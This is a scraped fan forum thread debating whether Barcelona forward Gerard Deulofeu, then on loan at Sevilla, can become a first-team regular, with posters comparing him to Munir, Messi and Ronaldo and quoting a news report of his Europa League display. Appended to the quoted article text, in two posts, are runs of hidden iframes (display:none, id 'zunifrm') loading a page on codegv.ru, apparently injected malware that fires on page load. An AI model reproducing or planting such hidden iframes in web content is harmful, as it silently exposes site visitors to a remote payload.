Gerard Deulofeu

Zangash

Banned
Yeah, Deulo is still plenty young to iron out his wrinkles, but he needs to put effort into it. He's got some poor habits that are not easy to get out off without some considerable effort.

Munir is a year younger, and far less experienced playing-wise, yet is the more polished player.

To be fair, it doesn't seem as fair to compare him to Munir. Munir has gone from Juvenil A to first team starter and Spain national in less than a year, so it's clear he's pretty far advanced for his age.

Barcilliant

I will be VERY, VERY surprised if Deulofeu becomes a first team regular at Barca. He lacks intelligence and dribbles into a blind alley way to often. His defensive contribution is minimal too. I could see him becoming the main man at a club like Sevilla but at the moment there is no way he can make it to our first team.

Adversus

I can see him making it. I just don't think he'll make it as a 20 or 21 year old. I think it will take at least another 2 seasons after this one before he'll get to the stage where he could be a starter.

If he spends those two after this one on Barca's bench then I don't think he'll make it. He definitely has the talent and the intelligence when to use it will come in time. At lower leagues it always worked so he's just figuring out now when it does and does not.

I never think he'll be much of a defender but as I said for Everton considering the position he played and what Martinez asks of wide players. He was fine.

DinhoR10

Deulofeu might end up going to Real madrid or another team where he can basically be Cristiano and just worry about attacking without heed for defending. He just seems like that type of player and he has the talent. I suppose its whether or not Barca would be willing to change how they do things to accommodate him or instead hedge their bets on Adama/Seung woo lee

F

Flavia

Two European assists
Deulofeu suggests he didn't know he was swapping Barça for Sevilla

Gerard Deulofeu shone for Sevilla in the Europa League on Thursday but then said he didn't know Barça were sending him on loan

Gerard Deulofeu at last got a chance to show his new club Sevilla what he is all about - and he made sure he took it.

The Barcelona forward, who is spending the season on loan in Andalusia, has played just 17 minutes in the league so far this season, but he was handed a start against Feyenoord in the Europa League on Thursday evening.

And from the word go Deulofeu impressed. He was responsible for setting up both goals in his side's 2-0 win and was later named man of the match.

However, speaking to Onda Cero after the game he sent a message in the direction of the Blaugrana:

"I would like to have known I was going to be sent out on loan," he said in reference to his surprise move south in August.

The 20-year-old now wants to win the confidence of his new boss, Unai Emery, but he knows that he has to demonstrate patience.

"You have to take it little by little," he explained. "This is a process, as the 'mister' has said. You don't just turn up somewhere and be the best."<iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe>

BibB

No wonder he looked disgruntled if this is true. Could be just a show of defiance toward Lucho right enough.

Zangash

Banned
I will be VERY, VERY surprised if Deulofeu becomes a first team regular at Barca. He lacks intelligence and dribbles into a blind alley way to often. His defensive contribution is minimal too. I could see him becoming the main man at a club like Sevilla but at the moment there is no way he can make it to our first team.

Sevilla? If he maximizes his goalscoring potential he could be a star at City or United.

KingMessi

SiempreBlaugrana
Deulofeu might end up going to Real madrid or another team where he can basically be Cristiano and just worry about attacking without heed for defending. He just seems like that type of player and he has the talent. I suppose its whether or not Barca would be willing to change how they do things to accommodate him or instead hedge their bets on Adama/Seung woo lee

Why not all three? :cry:

evilhita666

Barçapocalypse NOW!
"You have to take it little by little," he explained. "This is a process, as the 'mister' has said. You don't just turn up somewhere and be the best."<iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Now he just has to believe those words and he'll be set...

BBZ8800

He is no Cristiano.
Cristiano was trashing senior opponents at the age of 17 in Portuguese league.
At the age of 18, he played a one-man show against Man. utd in a friendly match and they have bought it after that match (after Barcelona bought Ronaldinho, Man. Utd's first target).

At the age 18, he was already awesome in Man. Utd.
Not as good as today, but he was very dangerous and influental (on a senior level).

On the other hand, Deulofeu has done absolutely NOTHING till the age 20,5 at the senior level.
So, comparing Deulo's current "work" with any of world's top players just doesn't make any sense.

Both Messi and Ronaldo were huge talents, but they were already awesome at the senior level at the age of 17-18, whenever they entered the field.
They didn't have any problems jumping from junior to senior level.
They were the best players in the world both against juniors, but also IMMIDIATELY against bigger boys.

Deulo's current senior work doesn't have anything comparable to those players.

Last edited:

Adversus

The fact he hasn't progressed as quickly as CR is probably down to the fact he has come through the youth setup rather than for a team that he could realistically be a starter for. There's nothing like minutes but those minutes need to be for teams where the level is right.

It doesn't necessarily have anything to do with talent.

Plus players develop at different paces. Look at the careers of CR and Rooney.

raskolnikov

Deulofeu annoys me, he comes across as a guy who feels entitled to all kind of things because he talented and then acts prissy when things dont go his way.
Also dont see the talent in him like some others, he is no potential Messi or Cr7, at best when he gets his attitude straight he will be a poor man's Navas.

BBZ8800

The fact he hasn't progressed as quickly as CR is probably down to the fact he has come through the youth setup rather than for a team that he could realistically be a starter for. There's nothing like minutes but those minutes need to be for teams where the level is right.

It doesn't necessarily have anything to do with talent.

Plus players develop at different paces. Look at the careers of CR and Rooney.

But people here are assuming that he is the same level of talent as Messi and Ronaldo.

And then are making 1000s of strange excuses of why he hasn't shown anything on a senior level yet.

1. first it was Everton, coaches and everything
2. then a bad guy Lucho didn't give him a proper chance in Barca to become a new Messi or Ronaldo
-- and that is all he needed. He "only" needed minutes and he would soon turn into a new Messi or Ronaldo
3. now, already there is an excuse that they played on the wrong/right level in that moment

I have been watching football/reading internet in those days the same as today:
1. Messi performed like a little wizzard in every minute whenever he entered the field
-- for Barca (senior team) and for Argentina NT senior team
-- from the age 17-18 he was trashing all opponents, aka 25-30-35 year old defenders
-- I was extremely happy whenever he was entering the field in the minute 70
-- you just knew that he will bring magic, goals and assists right away, in every single match
-- not only with one-two fancy moves and fancy celebrations, but with constant dribblings, running, workrate, defending, awesome linking up, and he fitted in Barca's senior team like as if he's been playing there for 20 Seasons already
-- there wasn't a single bad step in Messi's senior career since the age 17, and there wasn't a single minute where you could have wondered: "Will he make it or not?"
-- on every single match/in every single minute, he was already showing in every aspect (technical, tactical, mental, motivation, he wasn't arrogant at all) that he will be the greatest one day

Ronaldo?
-- very similar story (except that he is arrogant, and not the greatest of all time, as Messi)
-- he was trashing teams in Portuguese Liga in his first senior Season
-- he trashed Man Utd in that friendly, but not with 1-2 fancy moves
-- he was dribbling past 5 Man. Utd's defenders for virtually 90 minutes, 20-30 times during that match
-- Man. Utd then bought him since they lost Ronaldinho
-- from the day 1 in Man. Utd and from the first minute in Manchester, he was also an awesome player. In every move, touch, you could see that he is special
-- but, he was scoring, assisting, doing crazy dribbles and everything
-- he was only 18 years old
-- and he had no problems at all to show his talent on a senior level (both in Sporting and then in Man. Utd)
-- also, as a 19 year old boy, he was THE LEADER of Portuguese senior NT team, and he led them to the final of Euro 2004
-- again, he was only 19, and look how he already played on a senior level

And then we have a 20,5 year old Deulofeu, who has done virtually nothing in senior club career, not to mention senior NT team.

He is a huge talent, but comparing him with young Messi or young Ronaldo is just incredibly insane.
18 year old Messi benched Guily and Henrik Larsson.

20 year old Deulofeu can't get a place in Barca against guys like Pedro, and against kids like Munir and Sandro.

Deulofeu will probably never make it at Barca.
He will or he will not be a player for some other La Liga side one day, the time will tell.
But he SURELY won't be a new Messi or Ronaldo.

Last edited:

BBZ8800

For guys who have maybe forgot how a 18 year old boy Messi played (and who are comparing Deulo with Messi or Ronaldo) and how a future world class player plays at the age of 18, here is Messi aged 18 at Gamper, Barca:Juventus:
(Not in the segunda division or against U18 NT teams, but against senior world class teams like Juventus)

He was the something like the boss even at the age of 18, even with Ronaldinho, Etoo and Larsson on the field.

When some of our youngsters will play in a similar way on a senior level at the age of 18, then we should hype him.
Today, media are hyping everyone, for almost anything.

Last edited:

Home of Barca Fans